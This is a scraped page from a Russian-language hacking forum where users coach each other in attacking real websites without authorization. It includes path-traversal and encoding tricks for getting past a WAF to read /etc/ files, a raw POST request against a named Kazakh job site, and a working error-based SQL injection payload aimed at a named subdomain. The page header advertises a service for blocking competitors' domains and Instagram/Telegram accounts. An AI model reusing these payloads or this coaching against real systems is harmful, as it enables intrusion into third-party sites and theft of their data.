УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 2149 из 2438

2149

Опции темы

Поиск в этой теме

Опции просмотра

#21481

20.10.2012, 04:05

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Отправить сообщение для Konqi с помощью ICQ

Цитата:

Сообщение от RazyKK

RazyKK said:
да там не include а file_get_contents. фильтруется etc , как можно обойти?

что именно фильтруется? никогда не встречал такого чтоб фильтрировался слово "etc", если /etc/passwd, то попробуй /etc/какаятофигня/../passwd

#21482

20.10.2012, 04:15

RazyKK

Познающий

Регистрация: 09.02.2009

Сообщений: 70

Провел на форуме:
393885

Репутация: 34

etc/любое слово - ошибка

#21483

20.10.2012, 04:19

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от RazyKK

RazyKK said:
etc/любое слово - ошибка

ну поэксперементируй с кодированием, с хексом и тп

попрубуй понять логику WAF. а сначала обясни зачем тебе нужен каталог /etc/ ?

#21484

20.10.2012, 04:31

RazyKK

Познающий

Регистрация: 09.02.2009

Сообщений: 70

Провел на форуме:
393885

Репутация: 34

хекс попробовал, 0x...... не работает. конфиги посмотреть. нашел пасс от дб, пробовал удаленно подкл к sql не успешно

#21485

20.10.2012, 04:33

postscripter

Guest

Сообщений: n/a

Провел на форуме:
2340

Репутация: 0

Народ, как правильно заэкранировать хвост запроса в MySQL? так /* не получается, и так -- или так # тоже, хотя в запрос они и попадают, но парсер всё равно выполняет всё что идёт за ними... И пишет You have an error in your SQL syntax

Запрос такой:

Код:

Code:
select * from (SELECT sector_id,sector_name , (select count(*) from tbl_jobs 
where status_cd='sENAB' and position_sector=s.sector_id and education_level=9; /* ) 
job_count FROM tbl_sectors s where lang_cd='RUS' order by order_id)a where a.job_count>0

#21486

20.10.2012, 04:34

RazyKK

Познающий

Регистрация: 09.02.2009

Сообщений: 70

Провел на форуме:
393885

Репутация: 34

попробуй #

#21487

20.10.2012, 04:36

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

RazyKK

лучше скрипты изучи

postscripter

ссылку скинь, гадалки уже спят

#21488

20.10.2012, 04:40

postscripter

Guest

Сообщений: n/a

Провел на форуме:
2340

Репутация: 0

Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать

Решётка тоже не прокатила. К сожалению...

Код:

Code:
POST /rabota_01.php HTTP/1.1
Host: www.karyera.kz
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 SF/2.09b
Range: bytes=0-399999
Referer: http://www.karyera.kz/
Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=&

В урле слова типа Select фильтруются, поэтому только через post.

#21489

20.10.2012, 04:50

Konqi

Постоянный

Регистрация: 24.06.2009

Сообщений: 542

Провел на форуме:
2101094

Репутация: 672

Цитата:

Сообщение от postscripter

postscripter said:
Пожалуйста)) Только не ломайте раньше меня plz, я сам хочу попробовать)) Не отнимайте игрушку, так сказать
Решётка тоже не прокатила. К сожалению...

Код:

Code:
POST /rabota_01.php HTTP/1.1
Host: www.karyera.kz
Accept-Encoding: gzip
Connection: keep-alive
User-Agent: Mozilla/5.0 SF/2.09b
Range: bytes=0-399999
Referer: http://www.karyera.kz/
Cookie: LEARN_LANGCD=RUS; LEARN_ANKETID=deleted; HRSITE_COMPANYID=22
Content-Type: application/x-www-form-urlencoded
Content-Length: 222

p_EducationID=9#--/*&p_EducationName=&p_LanguageID=&p_LanguageName=&p_GenderID=&p_GenderName=&p_CompanyID=&p_Keyword=&p_pageindx=&p_SectorID=&p_SectorName=&p_LocationID=&p_LocationName=&p_ExperienceID=&p_ExperienceName=&

В урле слова типа Select фильтруются, поэтому только через post.

http://candidate.karyera.kz/search_01.php

POST / p_Keyword='or(ExtractValue(1,concat(0x3a,version() )))='1

#21490

20.10.2012, 04:54

postscripter

Guest

Сообщений: n/a

Провел на форуме:
2340

Репутация: 0

Konqi, благодарствую, счас погляжу

Страница 2149 из 2438

2149

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился)	PEPSICOLA	Болталка	188	23.05.2010 10:05
Ваши любимые компьютерные игры	PEPSICOLA	Болталка	280	19.08.2009 00:01
Ваши телеги...	F-IFTY	Болталка	13	18.08.2009 18:22
Вопросы по Ipb 2.0	Voodoo_People	Уязвимости CMS / форумов	26	15.02.2005 22:57

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход